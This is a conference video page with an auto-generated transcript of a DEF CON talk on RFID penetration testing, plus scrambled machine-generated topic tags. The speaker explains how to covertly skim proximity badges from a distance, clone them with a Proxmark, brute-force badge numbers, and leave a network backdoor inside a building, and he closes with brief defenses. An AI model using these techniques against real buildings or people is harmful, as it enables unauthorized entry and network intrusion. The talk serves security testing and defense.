RFID Hacking: Live Free or RFID Hard
This is a modal window.
The media could not be loaded, either because the server or network failed or because the format is not supported.
Formal Metadata
| Title |
| |
| Title of Series | ||
| Number of Parts | 112 | |
| Author | ||
| License | CC Attribution 3.0 Unported: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor. | |
| Identifiers | 10.5446/38926 (DOI) | |
| Publisher | ||
| Release Date | ||
| Language |
Content Metadata
| Subject Area | ||
| Genre | ||
| Abstract |
|
DEF CON 2178 / 112
3
6
8
9
13
14
15
16
17
22
23
24
25
29
32
33
36
37
39
42
45
47
49
53
60
61
64
65
66
71
76
79
80
82
89
103
106
108
00:00
Hacker (term)Radio-frequency identificationRadio-frequency identificationSoftware testingHacker (term)BuildingPhysicalismPresentation of a groupControl flowObject (grammar)Different (Kate Ryan album)SoftwareBitUtility softwareComputer animation
01:40
PlastikkarteCloningBackdoor (computing)InformationRadio-frequency identificationPlastikkarteBuildingSoftware testingInformationCloningHacker (term)Computer animation
02:28
PlastikkarteDistanceCloningInformationBuildingYouTubeNumbering schemeLimit (category theory)VideoconferencingType theoryRadio-frequency identificationPlastikkartePoint (geometry)Multiplication signPresentation of a groupDifferent (Kate Ryan album)Computer animation
03:50
DistanceDistanceNumbering schemePlastikkarteHacker (term)InformationRight angleRadio-frequency identificationLaptopRange (statistics)Asynchronous Transfer ModeComputer animation
05:27
DistanceRadio-frequency identificationInformation securityCodeSoftware testingAverageComputer animation
06:40
DistanceWindowInformationThumbnailTouchscreenRange (statistics)Right angleNumbering schemePlastikkarteRadio-frequency identificationBitPortable communications deviceComputer animationMeeting/Interview
09:13
Power (physics)TouchscreenPlastikkarteWebsiteCodeGame controllerLogicComputer animation
10:01
Computer fileMemory cardPlastikkarteVideoconferencingInheritance (object-oriented programming)Computer animationEngineering drawing
10:59
LaptopFunction (mathematics)MereologyPlastikkartePositional notationInformationBitComputer fileMultiplication signSingle-precision floating-point formatCodeRadio-frequency identificationNumbering schemeRange (statistics)Computer animation
12:13
InformationCloningRevision controlHoaxRight angleAsynchronous Transfer ModeComputer animation
12:59
InformationProduct (business)PlastikkarteProgrammer (hardware)Computer animation
13:35
PlastikkarteMemory cardSpacetimeType theoryComputer fileCloningSoftware testingComputer animation
14:22
Numbering schemePlastikkarteCodeCloningBitComputer animation
15:08
PlastikkarteDistanceInformation technology consultingPoint (geometry)Computer animation
15:40
FrequencyDistancePhysicalismLink (knot theory)Frequency1 (number)Information securityMultiplication signComputer animation
16:34
Port scannerPrincipal ideal domainMetropolitan area networkMereologyExtension (kinesiology)BlogCycle (graph theory)Video gameInformation securityTerm (mathematics)Product (business)Arithmetic progressionDecision theoryPurchasingPhysicalismWeb pageComputer animation
17:44
File formatPlastikkarteDecision theoryRAIDPower (physics)1 (number)DistanceAreaBuildingNear-ringLocal ringGame controllerPhysicalismMemory cardPhysical systemSoftware testingPlastikkarteConnectivity (graph theory)Moment (mathematics)BitCommunications protocolInformation securityDirection (geometry)Computer animation
18:53
CodeOrder (biology)Numbering schemeSpacetimeBitEntropiecodierungMemory cardPlastikkarteProduct (business)Forcing (mathematics)File formatInformation1 (number)Medical imagingGoogolRandomizationRadio-frequency identificationMereologyGame controllerAuthenticationReading (process)Computer animation
20:58
PlastikkarteIdentity managementPlastikkarteBitDigitizingMemory cardComputer animation
21:37
Information securityDecimalFunction (mathematics)CodeImage resolutionBitRight angleBuffer solutionPlastikkarteBuildingDigitizingProduct (business)Revision controlPositional notationParity (mathematics)SimulationMetropolitan area networkComputer animation
22:42
Field (computer science)Software testingBuildingMessage passingLine (geometry)Hand fanType theoryRadio-frequency identificationMemory cardMusical ensembleComputer clusterComputer animation
23:41
Tabu searchSingle-precision floating-point formatVideoconferencingRevision controlRadio-frequency identificationMemory card2 (number)Hacker (term)Computer animation
24:26
Data centerAreaForcing (mathematics)Numbering schemeDifferent (Kate Ryan album)PlastikkarteInformationCodeProof theoryFirmwareGroup actionSimilarity (geometry)Scripting languageComputer animation
25:32
Hacker (term)Closed setBacktrackingSoftwareDifferent (Kate Ryan album)QuicksortScripting languageMultiplication signRadio-frequency identificationTrailComputer animation
26:05
PlastikkarteElectronic mailing listSocial classSoftwareInformation securityInformationFrequencyPresentation of a groupPlastikkarteTouchscreenLetterpress printingType theoryMemory cardRadio-frequency identificationField (computer science)Computer animation
27:12
Radio-frequency identificationCodePlastikkarteMereologyStructural loadWebsiteBitComputer animation
27:53
MIDIWhiteboardTouchscreenNumbering schemeComputer fileFunction (mathematics)outputPlastikkarteComputer animation
28:41
Pulse (signal processing)Interface (computing)Function (mathematics)1 (number)Single-precision floating-point formatPulse (signal processing)Function (mathematics)DistanceType theoryBitPhysicalismPhysical systemRevision controlLie groupPoint (geometry)Memory cardPlastikkarteInformation securityWhiteboardComputer animation
30:18
Message passingUsabilityPlastikkarteComputer fileType theoryOntology
30:49
PlastikkarteBroadcasting (networking)Plastikkarte1 (number)Power (physics)BuildingDistanceLimit (category theory)TheoryComputer animation
31:26
Web pageAsynchronous Transfer ModePlastikkarteCloningSimulationMemory cardVideoconferencingPlastikkarteTerm (mathematics)Revision controlPower (physics)HoaxType theoryLink (knot theory)DistanceSlide ruleAsynchronous Transfer ModeSheaf (mathematics)Radio-frequency identificationProgrammer (hardware)Computer animation
32:38
EmailSystem programmingControl flowLine (geometry)Radio-frequency identificationMetropolitan area networkFunction (mathematics)Insertion lossBuilding9K33 OsaDigital electronicsComputer animation
33:29
ForceRouter (computing)Scripting languageGame controllerProjective planeSoftwareBackdoor (computing)Computer animation
34:04
Information securityData centerPower (physics)Plug-in (computing)Regular graphMedical imagingSoftwareLaptopComputer animation
34:43
Multiplication signSoftwarePlastikkarteOrder (biology)Goodness of fitProduct (business)EncryptionAuthenticationDependent and independent variablesFrequencyBuildingFrame problemFlagComputer animation
35:41
Slide rule1 (number)Normal (geometry)View (database)Mechanism designSampling (statistics)PlastikkarteTelecommunicationMultiplication signGreen's functionSoftware testingComputer animation
36:53
Computer animation
Transcript: English(auto-generated)
00:00
Welcome, everybody, to RFID hacking, live free or RFID hard. My name is Fran Brown. I'm a managing partner at Bishop Fox, formerly Stack and Lew. We just rebranded and got some exciting stuff to show you guys here today. I'm just going to get right into it. Basically what I want to go over today is to cover practical advice on successfully
00:28
performing a penetration test of an RFID physical security system. A little bit of background behind this, about a year ago I was doing an assessment of electric utility and I needed to get to their SCADA network which was only accessible from two buildings. So I needed
00:45
to break into a building. That's how it all started. That was my goal. So I started looking into, you know, different RFID presentations that have been in the past. Unfortunately there was no hacking exposed RFID. That just let me know what I would need to know
01:06
to be able to break into a building. So I watched all the past presentations I could find, anything I could find, and after a couple of days I realized I was no closer to achieving my objective than I was when I started. Most of the presentations in the
01:24
weren't released or were more theoretical. They didn't give me exactly what I needed to know to be able to break into a building. So that's what I hope to cover here today. And I'm going to finish up with practical defenses as well so you know how to protect yourself. So breaking it down, it's a pretty simple
01:43
methodology. When I want to do an RFID penetration test, it just boils down into three simple steps. First, steal somebody's badge information without them realizing it while walking by them. Two, taking that information and making a clone of their card. And then three, going into the building that I want to break into and possibly planting a back door
02:04
so I don't have to stay there very long. Seems pretty simple. But the thing that I soon realized that step one was a little bit difficult because most of the tools out there required you to get within a couple centimeters to be able to successfully steal
02:22
someone's badge information out of their pocket or their purse or what have you. So that led to what I like to call the ass grabbing method of RFID hacking. I watched these from different presentations, YouTube videos, things I've seen in the past where
02:41
the people go on and on about how insecure it is and how easy it is to steal somebody's badge information and then they have things like this where they're walking up and grabbing people's asses with a Proxmark run down their sleeve with a big CD sized antenna and walking around ass grabbing. I don't know how many ‑‑ see Jonathan
03:01
West is up there. I don't know how many times you could potentially do that, walk around in a target facility and start grabbing ass before you actually get caught. I imagine maybe once or twice. This wasn't a realistic thing for me. This isn't going to work. I'm not sure what I could do at this point. But there's not really any tools that are
03:23
out there that would allow me to realistically be able to pull this type of attack off. So I started looking into my own custom solutions. With that, I'm going to do a couple quick videos that I think demonstrate the limitations as well as our tools for stealing
03:41
for step one there and making a clone of a car just to show how easy it is now to be able to pull this off and steal someone's badge number and then break into a building. Can you guys see that okay? So in this first one, this is kind of demonstrating
04:06
‑‑ how many of you are familiar with the Proxmark 3? It's probably number one tool you could buy. It's actually really great for a lot of purposes. Sorry about that.
04:21
It's too much for the microphone. But as you'll see here, it also has the problem of this ‑‑ of distance. This is the Proxmark. This is a RFID hacking tool you could buy. By far the most popular. We have ‑‑ it's plugged into my laptop here via USB and then via another cable there's the antenna. And we see that right
04:45
now we are running the Proxmark and we have it in listening mode. It's trying to read right now. So as we can see, it still does not see the card even at this range. So I'll keep going down. Keep going down. Getting closer to the antenna. Closer still.
05:04
Until ‑‑ there we go. 6339. We have to be within probably about an inch right here before it actually starts picking up the badge information. 6339. So this is not how close you have to get to somebody on their person to be able to
05:21
effectively use this tool to steal their information. Which is a little too close for comfort if you ask me. So, I mean, how many people here have pulled off successful penetration tests with the Proxmark or whatever existing tools that are out there? Handful of people? I wasn't ‑‑ I guess you could, but you saw the antenna
05:44
and it's about the size of a CD and typically people would run it down their sleeve and have the CD and try to go up and guess where the person has their badge on them to begin with. If you don't know which pocket it is, start feeling around. So, I ‑‑ I saw a few things where people posted custom solutions that they had done.
06:05
They didn't really release code or, you know, practical advice on how to put it together. So I kind of had to do my own thing. It will be up on the website tomorrow, but my goal here was to make it so that I can create a tool that security professionals
06:21
who don't know a lot about RFID or have an electrical engineering background or are going to build their own custom antennas, your average security professional who wants to be able to perform this kind of pen test so they can get up and running realistically quickly. So ‑‑
06:43
I wanted to be great if there was a tool that took that step one that allowed us to secretly steal this information without having to go up and grab somebody's butt. So as a crazy random happenstance, we do have such a tool. 6339 again. If we look to my
07:03
left here, this is where I'm calling the Tastic Long Range RFID Stealer from the company Bishop Fox. We see it's a weaponized commercial reader. We'll throw it up there. You can see it's a 26‑bit card. And again, SODA kill 113 and card number 6339.
07:28
So it puts it to the screen nice as well. I'm clearly a few feet away right now. And with this, I can steal the information without having to go up and grab somebody's butt.
07:43
So taking a little quicker look at what this tool is actually doing and how the circuit board comes into play. I'm going to turn this off. And we can see that it is about a foot by a foot and only an inch deep. Extremely light, portable. Have a missile
08:06
switch on the back here, which I was using to not accidentally turn it on, things like that. It's completely self‑powered and portable. So what you would do is take this ‑‑ put it in your messenger bag or backpack or briefcase, walk around
08:24
with it, walk by somebody from up to three feet away and pick up their badge information, which is much better than, you know, grabbing butts up here. Now it is right to the screen. But we actually see it's easy to take apart here. Just a single
08:43
screw in the front, thumb screw that I can just twist out and take the lid off. What we have here is this is a long‑distance commercial badge reader, the kind that you
09:05
would find in parking lots so that you don't have to get out of your car. You can just roll it on your window and reach your arm out of the car window and hold your badge out and get it picked up. So it's meant to be picked up from several feet away. All of this was in here to begin with. All I did was add the LCD screen, the batteries
09:24
to self‑power it, and you will recognize this circuit board here, which you have without all of the things already installed. It has all the logic, the code behind it will be on our website for you to download as well. And this is just an Arduino controller
09:40
that you can buy online on Amazon, Radio Shack, as well as just some resistors and a few things there you can pick up anywhere. We have a lot of detailed instructions on the website on how to recreate this, which is our main goal here. And finally we see we have a micro SD card, which not only was it writing it, but it
10:05
is the next file. So pretty cool. Basically ‑‑ thank you. So, you know, for those who are really attached to it,
10:21
the ass grabbing methodology is still at your disposal if that's what you want to do. But this I think is a much better solution. And as you can see, it's super light. Got just self‑powered. Completely portable. Picks it up from a couple feet away as opposed to a centimeter or two. So effectively this was my attempt at solving that step one of
10:48
those three steps. And then I just have one more video which shows you step two, which
11:04
I mentioned I like the prox mark ‑‑ the output of ‑‑ pop it into my laptop. It should come up over here. So we should see the SD card came up that I pulled from
11:28
our long range RFID stealer. Check that out. And we see that there's a single file. Cards.text. Just a simple text file. Click on that. And we see here ‑‑ we scanned
11:49
it a few times. It's a 26‑bit card. Here is the hexadecimal notation for that badge information. We actually decoded for you. It's facility code 113 and badge number
12:04
6339 as we saw printed on the card. We actually have the binary as well. So now we've successfully completed step one. We've taken this silently stealing badge information and made it a realistic possibility where we can from three feet away casually
12:25
walk by you and steal the information. Now that we have that, we can use tools like the prox mark to quickly create a clone fake version of your badge so that we can go use it. And that is extremely easy. It's a single command. We already have the prox mark set up here. So what we're going to do is I'm going to go ahead and copy
12:49
the hexadecimal version of this badge, 6339. Click copy. And we're going to come back to our prox mark here. Now the prox mark is in read mode right now. So by hitting
13:03
this button I'll stop that. So now we have the badge information from our tool. Just this hexadecimal value. And what we're going to do is take this programmable T557 card which is a programmable card that doesn't read like anything right now. And
13:24
we can turn this ‑‑ this is just a sticky note. It's clearly not the 6339 badge. Let's put a post it on there. It's programmable. So I just lay that on top of the antenna here. And if we look right here, all I'm going to do is type in LF for low frequency.
13:50
Hit, because it's a hit card. Clone. Space. And then I'm just going to paste in that value we took from our cards.txt file. And click enter. And we see cloning tag with
14:06
that value that we stole. Done. So right now this card is functionally an exact duplicate of the card that we stole, 6339. So let's test it out.
14:23
So we have our original again. Badge number 6339. The original card 6339. And it's a prox card to you. Go there. 6339 still. Now we take our clone card, this card which
14:46
is clearly not that same card. Just has my sticky note on it. And we come up to it. Badge 6339. Facility code 113. 26‑bit card. So now we've successfully
15:03
stolen and now made a fake copy of this person's badge. Cool. So pretty easy now, right? The ‑‑ hopefully you guys can get up and running with this
15:24
kind of tool. And it's ‑‑ at this point I've been able to train some of our consultants to do it now in about ten minutes. Here's the on switch which is also the off switch on the back. You know, go forth and prosper. So with that, what we're talking
15:42
about here is low frequency. I saw with some of the articles that came out people were posting links to high‑frequency long‑range antennas and things like that. But we're talking the 125 kilohertz low frequency technology for physical security systems. And looking at that, people have known about these issues for quite some time. But the interesting
16:05
thing to me was that no one's really done anything about it yet. This came from hit global directly from a post they had recently saying that 70 to 80% of physical security systems out there still use this legacy low frequency technology that we're exploiting
16:22
here despite us having known for quite some time. And they admit that there's no security, they've been hacked, we know this. They're not resistant to any of these kind of common attacks yet they still persist. And just looking at that, one of the motivations behind doing this talk actually after creating the tools was I noticed that we see in Chris
16:43
Page's talk from 2007, it couldn't be any simpler. If you're using this technology for your doors, you're highly insecure. It's a big bullet, that's it. That's 2007. And those quotes came from this blog post in June of 2013. So from 2007 to 2013, we've
17:01
made about zero progress in terms of upgrading these physical security systems. And that blog post is actually pretty interesting. It goes on to talk about some of the reasons why. The physical security product life cycle is about 20 years, they estimate. The most of the things out there were bought in the early 90s. HID offers more secure solutions
17:24
but people have bought and installed products from 20 years ago and are just more than happy with it. So for some extent it's ignorance on the part of the people making the purchase decisions, they just don't realize that these things are this insecure as well
17:42
as there's budget issues. So what we're looking at here is a basic breakdown of what's happening for a badging system for a door. There's four main components. And coincidentally if we're thinking about doing a pen test, those are the four areas that we'll want to target. So with this attack, we're targeting the card directly. We're going to the local
18:05
Starbucks in your building we want to break into or hang out in the smoke area or something like that and targeting the cards that are on somebody's person. These cards, basically when they come within near distance of a reader like this, the reader
18:21
powers it and it just starts singing out 26 to 37 ones and zeros. As soon as it gets powered it starts singing this out depending on what they have. And then the reader just reads these off the air and encodes them in protocol which I'll talk about in a little bit and forwards them on to the controller to make the decision about whether to open
18:42
the door or not. And then you have the host PC where physical security guard will be sitting at to add new users and monitor, you know, cameras and things like that. So in breaking this down, in doing this initial research, it was like pulling teeth.
19:02
I mean, just trying to understand what was going on with these things, what's written on the card, how far away can I be. Every question that would jump to your mind if you didn't know anything about RFID hacking, it would be like the 130th Google hit or some random product manual that I found the answer in. So I tried to compile as much as I could
19:22
here to make it easy. But one of the questions that come up is if I saw somebody's badge, if I looked at the number on the back, is that enough information for me to make a fake copy of it? You went on Google images and somebody took a picture and you saw their badge number, could you make a copy of that? Well, the short answer is, maybe,
19:42
if they're ‑‑ so basically there's 26 to 37 ones and zeros that it stings out the card when it comes to your reader. Those eventually get interpreted by a controller and the way they get interpreted is basically what they call the card format, which typically breaks down into your card ID and a facility code. What's written on the card is the card
20:07
ID, which is part of what you need. If they're using a standard 26‑bit card, then there's only 255 possible facility codes. So technically with that, I could just try that card number and facility code one, facility code two, facility code three, and pretty quickly be
20:26
able to brute force based on what you visually see on the card. If they've implemented like a 35‑bit card or something, then it wouldn't be as easy to do. There's also ‑‑ you'll typically see on these cards one number and then a space and then a longer number.
20:42
That longer number is just a sales order number. I found it in a product manual. If you want to buy more cards when you call the sales guy, you read them that number. It has nothing to do with authentication or getting you in the door or anything like that. So good to know. And this is what I'm talking about with the ‑‑ so in reading
21:02
this as well, I saw things from your standard 26‑bit card or your corporate 35‑bit card. Then you hear that they're 44‑bit cards. And then in the prox marks, you see typically when tools that are accessing them are 10 hexadecimal digits, which is only 40 bits. So what exactly is going on with the card was a little ‑‑ a little confusing to me because
21:25
people didn't really make it clear. So just to make it clear what's actually going on, it sings out 26 to 37 bits in the air. It's always 44 bits on the card. And when we see here ‑‑ I scanned this in from a product manual and put the notation there
21:42
myself. Typically the ‑‑ or always the first hexadecimal will be a zero which usually gets dropped, which is why you see it as 10. You see the full version there of 11 hexadecimal digits starting with a zero. So what happens is there's always 44 bits on the card, which you see up there. The standard 26‑bit is what you see on
22:01
the right. And then there ‑‑ it starts ‑‑ everyone look at that guy with a stare. So it's ‑‑ it's always ‑‑ every single card it starts with six zeros and a one, every single card. Six zeros and a one. And then there's a buffer of ten
22:24
zeros and then a parity ‑‑ or a sentinel bit and then your 26 bits. So if you have a 35‑bit card or anything up to 37, all it does is extend to the left there using that buffer of those ten zeros. And that's the full 44 bits that are on the card.
22:40
So mystery solved. This is on low‑frequency stuff and mainly for breaking into buildings. But this ‑‑ the type of attacks and the techniques that we're going for here are going to be only become more applicable as we go on. We're starting to see them in credit cards in the U.S. now. Passports and my favorite ‑‑ who here is a Disney
23:03
fan? Anybody ‑‑ Disneyland, Disney World? Yeah. So Disney is going over to RFID for everything. So it's going to be fun, experiments, some field research, get some fast passes to get to the front of the lines and things like that. You see the band there
23:21
on somebody's wrist. Everything from getting in the front door of Disney World to getting your fast passes for the rides to paying for things to your hotel room are all going to be ‑‑ it's all RFID‑based. They're rolling it out right now. So these things are just ‑‑ people are finding more and more uses for RFID technology that are going to be fun to do pen tests for. A couple of the tools that you want to have
23:45
in your arsenal, besides our tool here, I would definitely recommend the Proxmark. You can get cheaper versions but the nice palace version is $3.99. You can use it as we saw in the one video for making clone cards. It has all kinds of purposes
24:01
that are great for doing RFID hacking. It does have a single button on it. See that workflow there? One crazy workflow for the single button on top of the Proxmark which is a little fun. It's like stand on one foot and hold the button for four and a half seconds until it blinks red and orange and then hold it longer. That's literally
24:20
the one button's workflow, which is pretty cool. Another cool thing with the Proxmark is there's a tool called the Proxbrute. Have any of you guys heard of the Proxbrute before? A handful of people. So the Proxbrute is just custom firmware that someone from McAfee got in Brad released that you can load onto the Proxmark and use it to
24:47
do brute forcing. So each of these badges, we saw the card number and facility code. Once you have like a valid badge, if you stole maybe just a normal worker's badge information to get in the front door but you want to get in the data center and that
25:02
the card numbers themselves are sequential. So you could use this tool and the Proxmark will simulate being a badge and it will try that number, the next badge number, the next badge number. So it will allow you to brute force a different badge number to get into a data center or more secure area than the actual badge that you stole,
25:23
which is great. And it has a similar crazy workflow for that one button which is altered there. Also there's Adam Laurie's stuff, the RF idiot scripts. He has compiled a bunch
25:41
of different Python scripts for doing RFID hacking and keeps adding to them for all sorts of different purposes. So I would definitely recommend checking that out as well as one convenience is that the software, it all comes loaded on back track. So all you need to do is get the equipment, plug the USB in and fire up back track and you could be
26:01
up and running and doing some stuff pretty quickly. These are extremely cool. Has anyone seen these tools before from RFID? I don't think I've ever seen this in a security presentation on RFID. I happen to just stumble across it. And basically it's just two little USB sticks about that size. It requires no software. It's for field testing,
26:24
for people that install this type of equipment. And basically one of the questions that I had that I wanted to answer was, what if I don't know what kind of card this is? What if I don't know what technology it's using? Take the Disney example. The Disney stuff doesn't have identifying ‑‑ it has all Walt Disney stuff on their cards.
26:40
It doesn't have what kind of card it actually is. So if I wanted to figure out what technology it was, I would use these things. They have a high frequency and a low frequency USB stick. You plug it in. You open up Notepad. You lay a card on top of it and click print screen. And in Notepad it will tell you not only what the badge
27:00
information is, but exactly what technology it is, which matters for being able to understand what kind of tools you're going to need to break into it. So pretty cool. And then, again, this is our tool. Again, we just saw the demonstration of it already. I programmed in there. You see a 35‑bit card. Basically you'll be able to get one
27:25
of those circuit boards I'm about to give out or go to our website ‑‑ I should be up tomorrow ‑‑ download the code that you could send away to anyone that makes circuit boards and for about 30 bucks they'll send you a copy. Then you buy the
27:40
parts that you need, load the code that we have. It will be on our website and be up and running. You essentially plug this into any RFID reader that there is for any of the technologies. So as we'll see, simple missile switch in the back. Easily from three feet away. I designed it ‑‑ what I'll be releasing,
28:03
I designed it in fritzing. Anybody familiar with fritzing? I'll be releasing that and you can actually export it to extended grabber to send away to get the board. That's a picture of the board that I'll be giving away after the talk. Essentially you could take this
28:23
board and it basically has two inputs and two outputs. It's taking in the output of a reader like this one here. It's taking in the batteries and it's outputting the badge number to a screen and to a text file on the card. That's as simple as you can think of how the board is working. And it's tapping that output of the reader is this
28:46
output that I mentioned earlier which every single badge reader has this output and they typically use. So there's 26 to 37 ones and zeros. Basically there's data one and data zero. For each one it sends a pulse on data one. For each zero it sends a pulse
29:01
on data zero. We're just tapping into that. So essentially you could use this for any type of badge system. So the two main ones for physical security are hid procs and end dollar procs for the low frequency which technically are both owned by the company hid at this point. But if I held a hid badge up to an end dollar reader it wouldn't
29:23
do anything. Or if I held an end dollar card up to a hid reader it wouldn't do anything. So between these two long distance readers, one of which you see here, you're pretty much covered with 99% of the badges that people would have out there. So you could take my board, plug it into the hid reader which we have here and if you notice it's
29:41
not working you can plug it into the long distance end dollar reader and just walk around and grab people's end dollar cards as well. You see the proven secure lies written there for end dollar. End dollar claims to be more secure and they have a lot of people convinced that it is. Instead of just singing out the ones and zeros it does a
30:01
little bit of obfuscation which doesn't even matter because if we're using an actual end dollar reader like we are it does all the decoding for you. So it's very easy to do and we've made fake versions so both of these are just as susceptible. And finally I just plugged in with the Arduino an SD card and writing it to a text file
30:25
for ease but there are plenty of Arduino add ons that you can imagine when you play around with an add next from adding Bluetooth capabilities so I can see the badges on my phone as they're being read or even cell phone capability to have a text message mean every badge
30:42
that it sees if I leave it somewhere else. These things would be relatively easy to add on to this type of technology. Basically if you guys are aware of any tools that do this attack you can let me know. I've heard people talk about it in theory
31:02
in some Ph.D. papers but the distance limitation that we're now getting with 3 feet and what's centimeters before is due to powering the card not actually reading the ones and zeros that it's singing out. So people have talked about if you leave something near the front door of an actual building and you let the real reader of that door power their
31:21
card you can listen for those ones and zeros from further away. And I know that Chris patients talk he mentioned being able to get up to 10 feet with this in this passive mode letting someone else power it. This tool obviously never was released due to legal reasons I believe and I haven't seen any other tools that actually successfully do it
31:41
but it is something to be aware of in terms of getting further distance still. Making a copy of the card. I mentioned this in the video. What you would want to get are these T55X7 cards. They're like a dollar. You can buy them online. All these slides
32:01
my note sections are white papers, links to everything you would want for each topic are in there and I'll have links to where you can buy these. But these things are not blank cards. They're programmable cards. So they'll simulate the data and behavior of any type of card. And what I meant by when I mentioned a HID card wouldn't work with Andala and an Andala card wouldn't work with HID. These cards can behave like an Andala
32:24
card or a HID card. So they can simulate any type of card and the data on them. They're definitely something you want to have in your arsenal too. You can reprogram as much as you want to be your fake versions of cards. Finally, if people start using RFID
32:43
blocking wallets and stuff like that, we have to move down the line of what we're attacking. There are things out there where you can pop open the lid of the reader and start dumping things off the readers and attacking them directly. There's a man in the middle tool called Gecko where you plug it in the reader and as people badge in, it's writing
33:01
them all to something as well. And I didn't really design my circuit board to be used in that way, but I realized afterwards with a little minor alterations, you could use that circuit board. All I'm doing is tapping into the output of a real reader. You could take that circuit board, go to the front of a building that you're trying to break into, pop the lid off, insert it and have it sit there and record all the other
33:24
real badges that are coming through that reader. So you could use it in this way as well. And this Brad, I'll butcher his last name, Antonowich, from McCaffy, the guy that actually made that Proxbrute software I'm talking about, he has a project here
33:41
that you can see where he's come up with tons of scripts and things to attack the readers and attack the controllers directly, which are pretty cool. I would recommend checking out. Lastly, once you get in, you want to not be in the building any longer than you have to be. So I recommend ‑‑ any of you familiar with the Pwn Plug? Cool.
34:02
So it's just going to be your little personal VPN, your back door into their network. It's $1,000 for the regular Pwn Plug and $1,500 for the Power Pwn. It's pretty cool looking. It's a little hefty. I would recommend a lot of people are coming out with images for the Raspberry Pi that allow them to effectively do the same exact thing. Even
34:22
from Pony Express, you have the Raspberry Pwn, the Rogue Pi, the Pwn Pi. So for $35 instead of $1,500, you can create your own little back door to be on the network. You see there people use hollowed out old laptop chargers, things like that, with the Raspberry Pi in it to be their own little back door, which is pretty cool.
34:50
I think we're just about out of time, so I'm going to skip the defenses. Avoid being probes. I don't know if this will help you out or not, but it's very fashionable.
35:01
So I would recommend upgrading your systems, if possible, to the contact with smart cards, the high‑frequency stuff. These things can do challenge response, authentication, encryption. There's more secure products out there. If you're a company that has 100,000 employees placing everybody's badges and every single door out there might be not that realistic,
35:21
at least in any kind of good time frame. So in order to get around that, what I would recommend is changing ‑‑ using things like anomaly detection software so if I badge in at 8 in the morning every morning, but all of a sudden I'm badging in at 4 in the morning in a building I never go to, you can have it generate an alert and
35:40
flag you. Also, you have the protective sleeves that I'll talk about more in a second, but you want to not wear your badge in prominent view, so I can't make a realistic looking picture of it. Security screws that prevent people from easily popping the lid off your reader on your door instead of normal screws. And there's also ‑‑ some of your readers
36:03
have to check with tamper to tech mechanisms that will send an alert if someone is messing with the reader. Finally, the last slide is that those protective sleeves that you would get, some of them work and some of them don't. Before you buy 100,000 of them for your employees, make sure that it works. This is a green card protective sleeve,
36:23
which one of our employees is from Scotland, very charming fellow, and he has his green card, which has RFID in it and it has this sleeve that you should keep in it at all times to prevent communication with your card. It doesn't work at all. It's probably just a piece of paper. I don't know how they got over selling that to the federal government
36:41
for every single green card, but it doesn't work at all. And in my experience, there's no rhyme or reason. Half of them work, half of them don't. So get a sample, test it out before you buy them in bulk for your company. And that's it.